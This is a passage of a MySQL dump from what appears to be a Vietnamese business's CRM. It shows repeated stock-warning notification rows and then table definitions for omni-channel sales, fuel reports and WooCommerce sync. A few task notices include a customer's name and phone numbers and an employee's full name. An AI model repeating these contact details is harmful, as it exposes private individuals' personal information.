(4501, 1, 1, '2024-02-07 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4502, 1, 1, '2024-02-07 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4503, 1, 1, '2024-02-07 08:45:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4504, 1, 1, '2024-02-08 08:00:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4505, 1, 1, '2024-02-08 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4506, 1, 1, '2024-02-08 08:30:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4507, 1, 1, '2024-02-08 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4508, 1, 1, '2024-02-09 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4509, 1, 1, '2024-02-09 08:15:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4510, 1, 1, '2024-02-09 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4511, 1, 1, '2024-02-09 08:45:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}');
INSERT INTO `tblnotifications` (`id`, `isread`, `isread_inline`, `date`, `description`, `fromuserid`, `fromclientid`, `from_fullname`, `touserid`, `fromcompany`, `link`, `additional_data`) VALUES
(4512, 1, 1, '2024-02-10 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4513, 1, 1, '2024-02-10 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4514, 1, 1, '2024-02-10 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4515, 1, 1, '2024-02-10 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4516, 1, 1, '2024-02-11 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4517, 1, 1, '2024-02-11 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4518, 1, 1, '2024-02-11 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4519, 1, 1, '2024-02-11 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4520, 1, 1, '2024-02-12 08:00:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4521, 1, 1, '2024-02-12 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4522, 1, 1, '2024-02-12 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4523, 1, 1, '2024-02-12 08:45:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4524, 1, 1, '2024-02-13 08:00:03', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4525, 1, 1, '2024-02-13 08:15:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4526, 1, 1, '2024-02-13 08:30:01', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4527, 1, 1, '2024-02-13 08:45:02', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>', 0, 0, '', 1, NULL, NULL, 'a:1:{i:0;s:312:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1932\">Mã Sku: SP012 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 0000-00-00</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1812\">Mã Sku: HAN-01812 - Mã kho hàng: KHO-THANHMYLOI - exriry_date: 2024-01-24</a><br/>\";}'),
(4545, 1, 0, '2024-02-26 16:15:51', 'not_task_marked_as_complete', 16, 0, 'Tiến Cao Minh', 1, NULL, '#taskid=164', 'a:1:{i:0;s:76:\"Bán mới điều khiển thay thế quạt SINO 52 (Ms.Trang - 0865020225)\";}'),
(4546, 1, 1, '2024-02-26 16:16:02', 'not_task_marked_as_complete', 16, 0, 'Tiến Cao Minh', 1, NULL, '#taskid=167', 'a:1:{i:0;s:58:\"Khảo sát nhà máy HOGETSU VN - ngày 20/2 (sáng 9h30)\";}'),
(4555, 1, 1, '2024-02-28 08:05:39', 'not_task_marked_as_complete', 16, 0, 'Tiến Cao Minh', 1, NULL, '#taskid=168', 'a:1:{i:0;s:99:\"Hẹn khảo sát lắp đặt 3-4 quạt trần SUNON PS1 3m tại Thảo Điền - LH. 0819999433\";}');

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_cart_payment`
--

CREATE TABLE `tblomni_cart_payment` (
  `id` int(10) UNSIGNED NOT NULL,
  `cart_id` int(11) NOT NULL,
  `payment_id` varchar(30) NOT NULL,
  `payment_name` varchar(100) DEFAULT NULL,
  `customer_pay` decimal(15,2) NOT NULL DEFAULT 0.00,
  `datecreator` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_create_customer_report`
--

CREATE TABLE `tblomni_create_customer_report` (
  `id` int(10) UNSIGNED NOT NULL,
  `m_date_report` text DEFAULT NULL,
  `m_total_diesel` double DEFAULT NULL,
  `m_total_pertrol` double DEFAULT NULL,
  `m_total_other` double DEFAULT NULL,
  `m_total_by_cash` double DEFAULT NULL,
  `m_total_by_mpesa` double DEFAULT NULL,
  `m_total_by_card` double DEFAULT NULL,
  `m_total_by_invoice` double DEFAULT NULL,
  `m_total_amount` double DEFAULT NULL,
  `m_total_quantity` double DEFAULT NULL,
  `date_time_transaction` datetime DEFAULT NULL,
  `list_customer_report_id` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_create_customer_report_detail`
--

CREATE TABLE `tblomni_create_customer_report_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `create_customer_report_id` int(11) NOT NULL,
  `date_add` datetime DEFAULT NULL,
  `attendant_name` text DEFAULT NULL,
  `shift_type` varchar(100) DEFAULT NULL,
  `date_report` text DEFAULT NULL,
  `total_diesel` double DEFAULT NULL,
  `total_pertrol` double DEFAULT NULL,
  `total_other_product` double DEFAULT NULL,
  `total_by_cash` double DEFAULT NULL,
  `total_by_mpesa` double DEFAULT NULL,
  `total_by_card` double DEFAULT NULL,
  `total_by_invoice` double DEFAULT NULL,
  `total_sales` double DEFAULT NULL,
  `list_customer_report_id` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_customer_report`
--

CREATE TABLE `tblomni_customer_report` (
  `id` int(10) UNSIGNED NOT NULL,
  `ser_no` varchar(100) DEFAULT NULL,
  `authorized_by` text DEFAULT NULL,
  `date` date DEFAULT NULL,
  `time` varchar(100) DEFAULT NULL,
  `transaction_id` varchar(100) DEFAULT NULL,
  `receipt` varchar(100) DEFAULT NULL,
  `pay_mode` text DEFAULT NULL,
  `nozzle` text DEFAULT NULL,
  `product` text DEFAULT NULL,
  `quantity` double DEFAULT NULL,
  `total_sale` double DEFAULT NULL,
  `ref_slip_no` text DEFAULT NULL,
  `date_add` datetime DEFAULT NULL,
  `version` int(11) DEFAULT NULL,
  `customer_id` varchar(100) DEFAULT NULL,
  `payment_id` int(11) DEFAULT NULL,
  `shift_type` varchar(100) DEFAULT NULL,
  `date_time_transaction` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_log_discount`
--

CREATE TABLE `tblomni_log_discount` (
  `id` int(10) UNSIGNED NOT NULL,
  `name_discount` varchar(250) NOT NULL,
  `client` int(11) NOT NULL,
  `price` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `product_quality` int(11) NOT NULL,
  `total_product` int(11) NOT NULL,
  `date_apply` datetime NOT NULL DEFAULT current_timestamp(),
  `voucher_coupon` varchar(250) DEFAULT NULL,
  `order_number` varchar(100) DEFAULT NULL,
  `total_order` varchar(100) DEFAULT NULL,
  `discount` varchar(100) DEFAULT NULL,
  `tax` varchar(100) DEFAULT NULL,
  `total_after` varchar(100) DEFAULT NULL,
  `channel_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_log_sync_woo`
--

CREATE TABLE `tblomni_log_sync_woo` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(250) NOT NULL,
  `regular_price` int(11) NOT NULL,
  `sale_price` int(11) NOT NULL,
  `date_on_sale_from` date DEFAULT NULL,
  `date_on_sale_to` date DEFAULT NULL,
  `short_description` text DEFAULT NULL,
  `stock_quantity` int(11) DEFAULT NULL,
  `sku` text NOT NULL,
  `type` varchar(225) NOT NULL,
  `date_sync` datetime NOT NULL DEFAULT current_timestamp(),
  `stock_quantity_history` int(11) NOT NULL DEFAULT 0,
  `order_id` int(11) NOT NULL,
  `chanel` varchar(250) NOT NULL DEFAULT '',
  `company` varchar(250) NOT NULL DEFAULT '',
  `description` text DEFAULT NULL
